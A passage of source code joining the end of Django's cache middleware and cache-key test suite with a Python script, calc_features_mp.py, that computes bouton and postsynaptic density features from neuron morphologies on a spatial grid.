CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If only one argument is passed in construction, it's being used as
# middleware.
middleware = CacheMiddleware(empty_response)
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
# If more arguments are being passed in construction, it's being used
# as a decorator. First, test with "defaults":
as_view_decorator = CacheMiddleware(empty_response, cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
self.assertEqual(as_view_decorator.cache, self.default_cache)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(
hello_world_view, cache_timeout=60, cache_alias='other', key_prefix='foo'
)
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache, self.other_cache)
def test_update_cache_middleware_constructor(self):
middleware = UpdateCacheMiddleware(empty_response)
self.assertEqual(middleware.cache_timeout, 30)
self.assertIsNone(middleware.page_timeout)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_fetch_cache_middleware_constructor(self):
middleware = FetchFromCacheMiddleware(empty_response)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_middleware(self):
middleware = CacheMiddleware(hello_world_view)
prefix_middleware = CacheMiddleware(hello_world_view, key_prefix='prefix1')
timeout_middleware = CacheMiddleware(hello_world_view, cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cache_page_timeout(self):
# Page timeout takes precedence over the "max-age" section of the
# "Cache-Control".
tests = [
(1, 3), # max_age < page_timeout.
(3, 1), # max_age > page_timeout.
]
for max_age, page_timeout in tests:
with self.subTest(max_age=max_age, page_timeout=page_timeout):
view = cache_page(timeout=page_timeout)(
cache_control(max_age=max_age)(hello_world_view)
)
request = self.factory.get('/view/')
response = view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
time.sleep(1)
response = view(request, '2')
self.assertEqual(
response.content,
b'Hello World 1' if page_timeout > max_age else b'Hello World 2',
)
cache.clear()
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
request = self.factory.get('/view/')
csrf_middleware = CsrfViewMiddleware(csrf_view)
csrf_middleware.process_view(request, csrf_view, (), {})
cache_middleware = CacheMiddleware(csrf_middleware)
self.assertIsNone(cache_middleware.process_request(request))
cache_middleware(request)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.493e283d571a73056196f1a68efd0f66')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.17c1a507a0cb58384f4c639067a93520')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.06c8ae8e8c430b69fb0a6443504153dc')
def test_with_ints_vary_on(self):
key = make_template_fragment_key('foo', [1, 2, 3, 4, 5])
self.assertEqual(key, 'template.cache.foo.7ae8fd2e0d25d651c683bdeebdb29461')
def test_with_unicode_vary_on(self):
key = make_template_fragment_key('foo', ['42º', '😀'])
self.assertEqual(key, 'template.cache.foo.7ced1c94e543668590ba39b3c08b0237')
def test_long_vary_on(self):
key = make_template_fragment_key('foo', ['x' * 10000])
self.assertEqual(key, 'template.cache.foo.3670b349b5124aa56bdb50678b02b23a')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
def test_nonexistent_alias(self):
msg = "The connection 'nonexistent' doesn't exist."
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
caches['nonexistent']
def test_nonexistent_backend(self):
test_caches = CacheHandler({
'invalid_backend': {
'BACKEND': 'django.nonexistent.NonexistentBackend',
},
})
msg = (
"Could not find backend 'django.nonexistent.NonexistentBackend': "
"No module named 'django.nonexistent'"
)
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
test_caches['invalid_backend']
def test_all(self):
test_caches = CacheHandler({
'cache_1': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
'cache_2': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
})
self.assertEqual(test_caches.all(initialized_only=True), [])
cache_1 = test_caches['cache_1']
self.assertEqual(test_caches.all(initialized_only=True), [cache_1])
self.assertEqual(len(test_caches.all()), 2)
# .all() initializes all caches.
self.assertEqual(len(test_caches.all(initialized_only=True)), 2)
self.assertEqual(test_caches.all(), test_caches.all(initialized_only=True))
|
calc_features_mp.py
|
import sys
import os
import multiprocessing as mp
import traceback
import networkx as nx
import numpy as np
import constants
import util
import util_batch
import util_amira
import util_geometry
import util_graph
import util_meta
import util_time
import util_feature_IO
import util_morphology
import util_morphology_slice
def getEmptyValues(synapticSide):
if(synapticSide == "pre"):
return {
"length" : 0,
"distSoma" : [],
"boutons" : 0
}
else:
return {
"length" : 0,
"distSoma" : [],
"pstExc" : 0,
"pstExcApical" : 0,
"pstExcBasal" : 0,
"pstExcSoma" : 0,
"pstInh" : 0,
"pstInhApical" : 0,
"pstInhBasal" : 0,
"pstInhSoma" : 0,
}
def getBoutonDensity(boutonDensities, cellType, gridCells, grid, cube):
if(cube not in gridCells):
return 0
else:
return boutonDensities[cellType][grid[cube]["laminar_location"]]
def getPostsynapticTargets(densities, cellTypeId, edgeLabel, length, area):
pstDensities = densities[cellTypeId]
if(edgeLabel == "Soma"):
pstExc = pstDensities["exc"]["density_soma_length"] * length + pstDensities["exc"]["density_soma_area"] * area
pstInh = pstDensities["inh"]["density_soma_length"] * length + pstDensities["inh"]["density_soma_area"] * area
elif(edgeLabel == "ApicalDendrite"):
pstExc = pstDensities["exc"]["density_apical_length"] * length + pstDensities["exc"]["density_apical_area"] * area
pstInh = pstDensities["inh"]["density_apical_length"] * length + pstDensities["inh"]["density_apical_area"] * area
elif(edgeLabel == "BasalDendrite"):
pstExc = pstDensities["exc"]["density_basal_length"] * length + pstDensities["exc"]["density_basal_area"] * area
pstInh = pstDensities["inh"]["density_basal_length"] * length + pstDensities["inh"]["density_basal_area"] * area
else:
raise RuntimeError("invalid label {}".format(edgeLabel))
return pstExc, pstInh
def updateTraversalState(node_cube_branch, cube_branch_values, traversal_state, synapticSide, event):
"""
traversal_state = {
"nodeStart"
"nodeEnd"
"nextCube"
"activeCube"
"activeBranch"
}
"""
traversal_state["activeCube"] = traversal_state["nextCube"]
cube = traversal_state["activeCube"]
# first step on edge
if(event == "firstStep"):
nodeStart = traversal_state["nodeStart"]
if((nodeStart, cube) in node_cube_branch):
existingBranchId = node_cube_branch[(nodeStart, cube)]
traversal_state["activeBranch"] = existingBranchId
return cube_branch_values[cube][existingBranchId]
else:
# check new cube visited
if(cube not in cube_branch_values):
cube_branch_values[cube] = {}
# create new branch
newBranchId = len(cube_branch_values[cube])
cube_branch_values[cube][newBranchId] = getEmptyValues(synapticSide)
node_cube_branch[(nodeStart, cube)] = newBranchId
traversal_state["activeBranch"] = newBranchId
return cube_branch_values[cube][newBranchId]
# go from one cube into next
if(event == "crossBorder"):
# check new cube visited
if(cube not in cube_branch_values):
cube_branch_values[cube] = {}
# create new branch
newBranchId = len(cube_branch_values[cube])
cube_branch_values[cube][newBranchId] = getEmptyValues(synapticSide)
traversal_state["activeBranch"] = newBranchId
return cube_branch_values[cube][newBranchId]
# set branch in target node
if(event == "lastStep"):
nodeEnd = traversal_state["nodeEnd"]
node_cube_branch[(nodeEnd, cube)] = traversal_state["activeBranch"]
return None
def filterFeatures(boundsFilter, cube_branch_values):
filtered = {}
gridCells = boundsFilter["gridCells"]
if(gridCells):
for cube, branch_values in cube_branch_values.items():
if(cube in gridCells):
filtered[cube] = branch_values
else:
ixiyiz_min = boundsFilter["ixiyiz_min"]
ixiyiz_max = boundsFilter["ixiyiz_max"]
for cube, branch_values in cube_branch_values.items():
if(util_geometry.indicesInBounds(cube, ixiyiz_min, ixiyiz_max)):
filtered[cube] = branch_values
#print("filter", len(cube_branch_values), len(filtered))
return filtered
def getBoundsFilter(networkDir, boundsDescriptor, gridDescriptor, outProps):
if(boundsDescriptor is None):
return None
boundsFilter = {}
if(outProps):
boundsFilter["gridCells"] = None
boundsFilter["boxMin"] = outProps["gridBounds"]["boxMin"]
boundsFilter["boxMax"] = outProps["gridBounds"]["boxMax"]
boundsFilter["ixiyiz_min"] = outProps["gridBounds"]["ixiyiz_min"]
boundsFilter["ixiyiz_max"] = outProps["gridBounds"]["ixiyiz_max"]
else:
gridBounds = util_meta.loadGrid_ixiyiz(os.path.join(networkDir, "grid_{}_{}.csv".format(gridDescriptor, boundsDescriptor)))
boundsFilter["gridCells"] = set(gridBounds.keys())
if(boundsDescriptor == "ref-volume"):
boundsFilter["boxMin"], boundsFilter["boxMax"] = constants.getReferenceVolume()
elif(boundsDescriptor == "C2-volume"):
boundsFilter["boxMin"], boundsFilter["boxMax"] = constants.getC2Volume()
else:
raise RuntimeError("Invalid bounds descriptor: {}".format(boundsDescriptor))
return boundsFilter
def getBranchCount(cube_branch_values):
count = 0
for branches in cube_branch_values.values():
count += len(branches)
return count
def registerFeatures(neuronId, cube_branch_values, outProps):
if(outProps["type"] == "pstAll"):
pstAllExcArray = outProps["pstAllExc"]
pstAllInhArray = outProps["pstAllInh"]
lock = outProps["lock"]
gridBounds = outProps["gridBounds"]
D = {} # cubeArrayIdx -> (pstExc, pstInh)
for cube, branches in cube_branch_values.items():
pstExc = 0
pstInh = 0
for values in branches.values():
pstExc += values["pstExc"]
pstInh += values["pstInh"]
arrayIdx = util_geometry.getArrayIndex(gridBounds, cube)
D[arrayIdx] = (pstExc, pstInh)
lock.acquire()
for idx, values in D.items():
pstAllExcArray[idx] += values[0]
pstAllInhArray[idx] += values[1]
lock.release()
elif(outProps["type"] == "pst"):
pstAllExcArray = outProps["pstAllExc"]
pstAllInhArray = outProps["pstAllInh"]
gridBounds = outProps["gridBounds"]
nCubes = len(cube_branch_values.keys())
arrayIndices = np.zeros(nCubes, dtype=int)
arrayPstExcNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstExcApicalNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstExcBasalNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstExcSomaNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstInhNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstInhApicalNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstInhBasalNorm = np.zeros(nCubes, dtype=np.float32)
arrayPstInhSomaNorm = np.zeros(nCubes, dtype=np.float32)
i = 0
for cube, branches in cube_branch_values.items():
arrayIdx = util_geometry.getArrayIndex(gridBounds, cube)
arrayIndices[i] = arrayIdx
pstExc = 0
pstExcApical = 0
pstExcBasal = 0
pstExcSoma = 0
pstInh = 0
pstInhApical = 0
pstInhBasal = 0
pstInhSoma = 0
for values in branches.values():
pstExc += values["pstExc"]
pstExcApical += values["pstExcApical"]
pstExcBasal += values["pstExcBasal"]
pstExcSoma += values["pstExcSoma"]
pstInh += values["pstInh"]
pstInhApical += values["pstInhApical"]
pstInhBasal += values["pstInhBasal"]
pstInhSoma += values["pstInhSoma"]
if(pstExc > 0):
arrayPstExcNorm[i] = pstExc / pstAllExcArray[arrayIdx]
arrayPstExcApicalNorm[i] = pstExcApical / pstAllExcArray[arrayIdx]
arrayPstExcBasalNorm[i] = pstExcBasal / pstAllExcArray[arrayIdx]
arrayPstExcSomaNorm[i] = pstExcSoma / pstAllExcArray[arrayIdx]
if(pstInh > 0):
arrayPstInhNorm[i] = pstInh / pstAllInhArray[arrayIdx]
arrayPstInhApicalNorm[i] = pstInhApical / pstAllInhArray[arrayIdx]
arrayPstInhBasalNorm[i] = pstInhBasal / pstAllInhArray[arrayIdx]
arrayPstInhSomaNorm[i] = pstInhSoma / pstAllInhArray[arrayIdx]
i += 1
sortIdx = np.argsort(arrayIndices)
arrayIndices = arrayIndices[sortIdx]
arrayPstExcNorm = arrayPstExcNorm[sortIdx]
arrayPstExcApicalNorm = arrayPstExcApicalNorm[sortIdx]
arrayPstExcBasalNorm = arrayPstExcBasalNorm[sortIdx]
arrayPstExcSomaNorm = arrayPstExcSomaNorm[sortIdx]
arrayPstInhNorm = arrayPstInhNorm[sortIdx]
arrayPstInhApicalNorm = arrayPstInhApicalNorm[sortIdx]
arrayPstInhBasalNorm = arrayPstInhBasalNorm[sortIdx]
arrayPstInhSomaNorm = arrayPstInhSomaNorm[sortIdx]
outProps["featuresPost"][neuronId] = {
"arrayIndices" : arrayIndices,
"arrayPstExcNorm" : arrayPstExcNorm,
"arrayPstExcApicalNorm" : arrayPstExcApicalNorm,
"arrayPstExcBasalNorm" : arrayPstExcBasalNorm,
"arrayPstExcSomaNorm" : arrayPstExcSomaNorm,
"arrayPstInhNorm" : arrayPstInhNorm,
"arrayPstInhApicalNorm" : arrayPstInhApicalNorm,
"arrayPstInhBasalNorm" : arrayPstInhBasalNorm,
"arrayPstInhSomaNorm" : arrayPstInhSomaNorm,
}
elif(outProps["type"] == "pstBranch"):
pstAllExcArray = outProps["pstAllExc"]
pstAllInhArray = outProps["pstAllInh"]
gridBounds = outProps["gridBounds"]
for cube, branchValues in cube_branch_values.items():
arrayIdx = util_geometry.getArrayIndex(gridBounds, cube)
pstAllExcVal = pstAllExcArray[arrayIdx]
pstAllInhVal = pstAllInhArray[arrayIdx]
for values in branchValues.values():
pstExc = values["pstExc"]
if(pstExc):
values["pstExc"] = pstExc / pstAllExcVal
pstInh = values["pstInh"]
if(pstInh):
values["pstInh"] = pstInh / pstAllInhVal
outProps["featuresPost"][neuronId] = cube_branch_values
elif(outProps["type"] == "pre"):
if(outProps["featuresPre"] is None):
raise NotImplementedError("refactored to dict: nid -> ...")
gridBounds = outProps["gridBounds"]
nCubes = len(cube_branch_values.keys())
arrayIndices = np.zeros(nCubes, dtype=int)
arrayBoutons = np.zeros(nCubes, dtype=np.float32)
i = 0
for cube, branches in cube_branch_values.items():
arrayIdx = util_geometry.getArrayIndex(gridBounds, cube)
arrayIndices[i] = arrayIdx
boutons = 0
for values in branches.values():
boutons += values["boutons"]
arrayBoutons[i] = boutons
i += 1
sortIdx = np.argsort(arrayIndices)
arrayIndices = arrayIndices[sortIdx]
arrayBoutons = arrayBoutons[sortIdx]
outProps["featuresPre"][neuronId] = {
"arrayIndices" : arrayIndices,
"arrayBoutons" : arrayBoutons,
}
elif(outProps["type"] == "preBranch"):
outProps["featuresPre"] = cube_branch_values
elif(outProps["type"] == "postMorphology"):
return
else:
raise RuntimeError("invalid output type {}".format(outProps["type"]))
def isInsideBounds(cube, gridBounds):
ixiyiz_min = gridBounds["ixiyiz_min"]
ixiyiz_max = gridBounds["ixiyiz_max"]
return util_geometry.indicesInBounds(cube, ixiyiz_min, ixiyiz_max)
def getGraphset(networkDir, outProps):
if(outProps and "featureComputationData" in outProps):
return outProps["featureComputationData"]["graphset"]
elif(outProps and ((outProps["type"] == "pre") or (outProps["type"] == "preBranch") or (outProps["type"] == "postMorphology"))):
return outProps["graphset"]
else:
return util_morphology.loadGraphset(networkDir)
def getPreFeatureComputationData(networkDir, outProps):
if(outProps and "featureComputationData" in outProps):
boutonDensities = outProps["featureComputationData"]["boutonDensities"]
grid = outProps["featureComputationData"]["grid"]
gridCells = outProps["featureComputationData"]["gridCells"]
elif(outProps and (outProps["type"] == "pre" or outProps["type"] == "preBranch")):
boutonDensities = outProps["boutonDensities"]
grid = outProps["grid"]
gridCells = outProps["gridCells"]
else:
boutonDensities = util_meta.loadBoutonDensityMap(networkDir)
grid = util_meta.loadGrid_ixiyiz(os.path.join(networkDir, "grid_50-50-50_all.csv"))
gridCells = set(grid.keys())
return boutonDensities, grid, gridCells
def getPostFeatureComputationData(networkDir, outProps):
if(outProps and "featureComputationData" in outProps):
pstDensities = outProps["featureComputationData"]["pstDensities"]
elif(outProps and outProps["type"] == "postMorphology"):
pstDensities = outProps["pstDensities"]
else:
pstDensities = util_meta.loadPstDensityMap(networkDir)
return pstDensities
def getNeurons(batchfile, networkDir, outProps):
if(batchfile is not None):
batchDescriptor = os.path.basename(batchfile)
neuronIds = np.loadtxt(batchfile, dtype=int).reshape((-1)).tolist()
if(outProps and "featureComputationData" in outProps):
neuronsOriginal = outProps["featureComputationData"]["neuronsOriginal"]
else:
neuronsOriginal = util_meta.loadNeuronProps(os.path.join(networkDir, "meta", "neurons.csv"))
elif(outProps and (outProps["type"] == "pre" or outProps["type"] == "preBranch")):
batchDescriptor = "single-pre"
neuronIds = [outProps["neuronId"]]
neuronsOriginal = outProps["neuronsOriginal"]
elif(outProps and outProps["type"] == "postMorphology"):
batchDescriptor = "single-post"
neuronIds = [outProps["neuronId"]]
neuronsOriginal = outProps["neuronsOriginal"]
else:
raise RuntimeError
return batchDescriptor, neuronIds, neuronsOriginal
def getSliceParams(outProps):
if(outProps is None):
return None
elif("sliceParams" in outProps):
return outProps["sliceParams"]
else:
return None
def processBatch(batchfile, synapticSide, gridDescriptor, boundsDescriptor, networkDir, outputFolder, outProps=None, logFolder=None):
batchDescriptor, neuronIds, neuronsOriginal = getNeurons(batchfile, networkDir, outProps)
if(synapticSide == "pre"):
boutonDensities, grid, gridCells = getPreFeatureComputationData(networkDir, outProps)
else:
pstDensities = getPostFeatureComputationData(networkDir, outProps)
graphset = getGraphset(networkDir, outProps)
boundsFilter = getBoundsFilter(networkDir, boundsDescriptor, gridDescriptor, outProps)
registerEdgePoints = outProps is not None and outProps["type"] == "postMorphology"
sliceParams = getSliceParams(outProps)
util_geometry.setGridSize(gridDescriptor)
#print("batch {}: active grid size".format(batchDescriptor), util_geometry.GRIDSIZE)
for k in range(0, len(neuronIds)):
neuronId = neuronIds[k]
if(outputFolder):
outfile = os.path.join(outputFolder,"{}.csv".format(neuronId))
cellTypeOriginalId = neuronsOriginal[neuronId]["cell_type"]
try:
if(synapticSide == "pre"):
idx = len(graphset[neuronId]) - 1
filename = graphset[neuronId][idx]["file"]
T = graphset[neuronId][idx]["transformation"]
else:
filename = graphset[neuronId][0]["file"]
T = graphset[neuronId][0]["transformation"]
neuron = util_amira.readSpatialGraph(filename, T)
nOriginal = len(neuron)
if(sliceParams is not None):
neuron = util_morphology_slice.sliceNeuron(neuron, sliceParams)
if(synapticSide == "pre"):
components = util_graph.getSeparatedComponentsPre(neuron)
rootNode = components["axon"]["root"]
tree = components["axon"]["tree"]
else:
components = util_graph.getSeparatedComponentsPost(neuron)
rootNode = components["dendrite"]["root"]
tree = components["dendrite"]["tree"]
rootDists = {}
rootDists[rootNode] = 0
edges = list(nx.edge_dfs(tree, source=rootNode, orientation='ignore'))
node_cube_branch = {}
cube_branch_values = {}
edgeCounter = 0
edgeCounterMorphology = -1
for u, v, d in edges:
edgeCounter += 1
edgeCounterMorphology += 1
edge = neuron.edges[u, v]
nodeStart = u
nodeEnd = v
points = edge["points"]
if(d == "reverse"):
nodeStart = v
nodeEnd = u
points.reverse()
if(boundsFilter is not None and not util_geometry.pointsInBounds(points, boundsFilter["boxMin"], boundsFilter["boxMax"])):
continue
label = edge["label"]
if(synapticSide == "pre" and label == "Soma"):
raise RuntimeError("Traversed soma: u {}, v {}".format(u, v))
if(sliceParams is not None and label not in sliceParams["compartment"]):
continue
traversal_state = {
"nodeStart" : nodeStart,
"nodeEnd" : nodeEnd,
"nextCube" : None,
"activeCube" : None,
"activeBranch" : None,
}
dataHandle = None
if(boundsFilter is None):
rd = rootDists[nodeStart]
else:
rd = -1
pointsIntersected, indices = util_geometry.getIntersectedEdgePoints(points)
for i in range(1, len(pointsIntersected)):
p1 = pointsIntersected[i-1]
i1 = indices[i-1]
p2 = pointsIntersected[i]
i2 = indices[i]
traversal_state["nextCube"] = util_geometry.getCommonIndices(i1, i2)
if(i == 1):
dataHandle = updateTraversalState(node_cube_branch, cube_branch_values, traversal_state, synapticSide, "firstStep")
elif(traversal_state["nextCube"] != traversal_state["activeCube"]):
if(registerEdgePoints):
nextCubeInside = isInsideBounds(traversal_state["nextCube"], outProps["gridBounds"])
activeCubeInside = isInsideBounds(traversal_state["activeCube"], outProps["gridBounds"])
if(nextCubeInside != activeCubeInside):
edgeCounterMorphology += 1
dataHandle = updateTraversalState(node_cube_branch, cube_branch_values, traversal_state, synapticSide, "crossBorder")
l = np.linalg.norm(p1[0:3]-p2[0:3])
if(label != "Soma"):
if(boundsFilter is None):
rd += l
dataHandle["length"] += l
dataHandle["distSoma"].append(rd)
if(synapticSide == "pre"):
cubeForDensity = traversal_state["activeCube"]
if(gridDescriptor != "50-50-50"):
cubeForDensity = util_geometry.getClosest50MicronCube(cubeForDensity)
boutonDensity = getBoutonDensity(boutonDensities, cellTypeOriginalId, gridCells, grid, cubeForDensity)
dataHandle["boutons"] += boutonDensity * l
else:
area = util_geometry.getTruncatedConeArea(l, p1[3], p2[3])
pstExc, pstInh = getPostsynapticTargets(pstDensities, cellTypeOriginalId, label, l, area)
dataHandle["pstExc"] += pstExc
dataHandle["pstInh"] += pstInh
if(label == "BasalDendrite"):
dataHandle["pstExcBasal"] += pstExc
dataHandle["pstInhBasal"] += pstInh
if(label == "ApicalDendrite"):
dataHandle["pstExcApical"] += pstExc
dataHandle["pstInhApical"] += pstInh
if(label == "Soma"):
dataHandle["pstExcSoma"] += pstExc
dataHandle["pstInhSoma"] += pstInh
if(registerEdgePoints):
if(isInsideBounds(traversal_state["activeCube"], outProps["gridBounds"])):
if(edgeCounterMorphology not in outProps["edges"].keys()):
outProps["edges"][edgeCounterMorphology] = []
outProps["edgeLabels"][edgeCounterMorphology] = label
outProps["edges"][edgeCounterMorphology].append(p1)
